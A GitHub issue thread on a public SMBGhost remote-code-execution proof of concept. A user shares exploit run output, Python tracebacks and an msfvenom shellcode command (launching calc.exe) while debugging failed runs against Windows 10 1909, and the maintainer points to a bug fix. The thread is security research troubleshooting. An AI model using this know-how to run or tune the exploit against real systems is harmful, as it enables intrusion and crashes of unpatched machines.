search

chompie1337 / SMBGhost_RCE_PoC

1.31k stars 346 forks source link

Unable to unpack HalpApicRequestInterrupt #5

Closed 0xShkk closed 4 years ago

0xShkk commented 4 years ago

Hi, thank you for sharing your work!

So far, I was not able to reproduce the PoC.

Got it running against Windows 10 Enterprise 1909 x64 (Build 18363.418). Confirmed the system is vulnerable and SMB is reachable and open from attacker system.

Replaced user payload with simple msfvenom shellcode like: msfvenom -p windows/x64/exec CMD='calc.exe' -f c

Unfortunately the first run got me this output:

python3 exploit.py -ip 192.168.100.51 [+] found low stub at phys addr 13000! [+] PML4 at 1aa000 [+] base of HAL heap at fffff7adc0000000 [+] found PML4 self-ref entry 1e8 [+] found HalpInterruptController at fffff7adc00015a0 Traceback (most recent call last): File "exploit.py", line 448, in do_rce(args.ip, args.port) File "exploit.py", line 411, in do_rce search_hal_heap(ip, port) File "exploit.py", line 339, in search_hal_heap PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0] struct.error: unpack requires a buffer of 8 bytes

The second this one:

python3 exploit.py -ip 192.168.100.51 [-] physical read primitive failed!

And a third one this:

python3 exploit.py -ip 192.168.100.51 [+] found low stub at phys addr 13000! [+] PML4 at 1aa000 [+] base of HAL heap at fffff7adc0000000 [+] found PML4 self-ref entry 1e8 Traceback (most recent call last): File "exploit.py", line 448, in do_rce(args.ip, args.port) File "exploit.py", line 411, in do_rce search_hal_heap(ip, port) File "exploit.py", line 307, in search_hal_heap phys_addr = get_phys_addr(ip, port, index) File "exploit.py", line 244, in get_phys_addr pte_buff = read_physmem_primitive(ip, port, pte) File "exploit.py", line 188, in read_physmem_primitive buff = try_read_physmem_primitive(ip, port, phys_addr) File "exploit.py", line 203, in try_read_physmem_primitive buff = sock.recv(1000) socket.timeout: timed out

Seems like the service crashed after the first run?

But why were the HalpApicRequestInterrupt found at the first run but then contained more than 8 bytes? Or did I got the first error wrong?

Any ideas?

chompie1337 commented 4 years ago

Hi, this is a bug. I just pushed a fix.

Your last two runs it just seems to have timed out as this sometimes happens with the read primitive. If you get a timeout error, try running again. If another error occurs, let me know.

0xShkk commented 4 years ago

Unfortunately I get only bluescreens after the fix :/